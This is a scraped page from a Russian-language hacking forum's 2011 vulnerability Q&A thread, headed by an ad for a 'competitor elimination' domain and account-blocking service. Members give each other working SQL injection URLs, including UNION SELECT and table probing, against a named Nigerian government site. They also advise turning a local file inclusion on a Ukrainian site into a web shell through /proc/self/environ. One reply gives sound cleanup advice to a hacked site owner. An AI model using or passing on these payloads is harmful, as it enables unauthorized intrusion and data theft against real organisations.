УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1873 из 2438

1873

Опции темы

Поиск в этой теме

Опции просмотра

#18721

01.12.2011, 04:51

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от Wave

Wave said:
Тогда я пишу правильно )
Это мой сайт... так что вреда ему я никак не желаю
а вот узнать сможет ли мне кто либо навредить - хотелось бы знать

тогда вам сюда /forum110.html

Цитата:

Сообщение от None

Это так на него опера ругается ?
из-за чего... там ничего плохого нету

спросите яндексу, оно в блеклисте яндекса, по "Malware Warning"

#18722

01.12.2011, 04:57

Wave

Guest

Сообщений: n/a

Провел на форуме:
34031

Репутация: 0

Яндекс ругается из-за комментов что оставляют на сайте

там было и возможно еще есть спам

#18723

01.12.2011, 17:27

Melfis

Guest

Сообщений: n/a

Провел на форуме:
195266

Репутация: 53

Цитата:

Сообщение от Wave

Wave said:
Яндекс ругается из-за комментов что оставляют на сайте
там было и возможно еще есть спам

у тебя или стоит, или стоял фрейм или ещё какая херня, через которую распространялся троян. Домен, откуда распространялся трой попал в блек яши, потом за ним и твой сайт попал к нему в блек, через некоторое время (пол часа-час) твой сайт попал в блэк у оперы. После того, как ты закроешь дырки на сайте, убьёшь шеллы, сменишь пароли (чтобы те по новой не поставили фрейм) пройдёт ещё около двух суток прежде чем сайт твой выйдет из блэков. Даже, если в текущий момент в коде страниц ты не можешь найти такого фрейма, то это не значит, что как только вылезешь из блэка, его не поставят снова (те кто твой сайт ломанули).

Яша на спам на сайте не ругается таким образом.

#18724

02.12.2011, 18:55

lightangel

Guest

Сообщений: n/a

Провел на форуме:
35174

Репутация: -6

http://www.nwri.gov.ng/about/board_Detail.asp?id=52+order+by+14(error)

http://www.nwri.gov.ng/about/board_Detail.asp?id=52+order+by+13(no error)

But union select is not working and "user" table is available.

#18725

02.12.2011, 21:48

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Цитата:

Сообщение от lightangel

lightangel said:
http://www.nwri.gov.ng/about/board_Detail.asp?id=52+order+by+14(error)
http://www.nwri.gov.ng/about/board_Detail.asp?id=52+order+by+13(no error)
But union select is not working and "user" table is available.

http://www.nwri.gov.ng/about/board_Detail.asp?id=52+and+0+union+select+1,2,3,4, 5,6,7,8,9,10,11,12,13+from+msysaccessobjects

read some manuals =\

#18726

02.12.2011, 22:05

BigBear

Новичок

Регистрация: 04.12.2008

Сообщений: 11

Провел на форуме:
69033

Репутация: 8

Цитата:

Сообщение от lightangel

This is MsAccess

Injects

Код:

Code:
_ttp://www.nwri.gov.ng/about/board_Detail.asp?id=52+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+clients

_ttp://www.nwri.gov.ng/about/board_Detail.asp?id=52+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+clients.clin

_ttp://www.nwri.gov.ng/about/board_Detail.asp?id=52+and+(select+count(name)+from+clients)>0+and+1=1

Datas

Код:

Code:
path = c:\windows\system32\inetsrv\
Table = Clients
Fields = id, name, etc...

#18727

02.12.2011, 22:14

lightangel

Guest

Сообщений: n/a

Провел на форуме:
35174

Репутация: -6

Thank you so much, noted that.

#18728

02.12.2011, 22:18

sl1k

Новичок

Регистрация: 31.07.2009

Сообщений: 1

Провел на форуме:
4819

Репутация: 0

есть LRI вида http://www.svaltera.ua/index.php?inc=../../../../../../../../proc/self/fd/2

можно как то использовать ?

#18729

02.12.2011, 22:37

DyukiN

Guest

Сообщений: n/a

Провел на форуме:
74477

Репутация: 21

допустим я нашел путь в файлу phpinfo , как он мне чем то может помочь?

#18730

02.12.2011, 22:51

vasykas

Guest

Сообщений: n/a

Провел на форуме:
173402

Репутация: 37

Цитата:

Сообщение от sl1k

sl1k said:
есть LRI вида http://www.svaltera.ua/index.php?inc=../../../../../../../../proc/self/fd/2
можно как то использовать ?

попробуй

/proc/self/envirion если есть то процентов 50

получиться шелл закинуть

Страница 1873 из 2438

1873

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход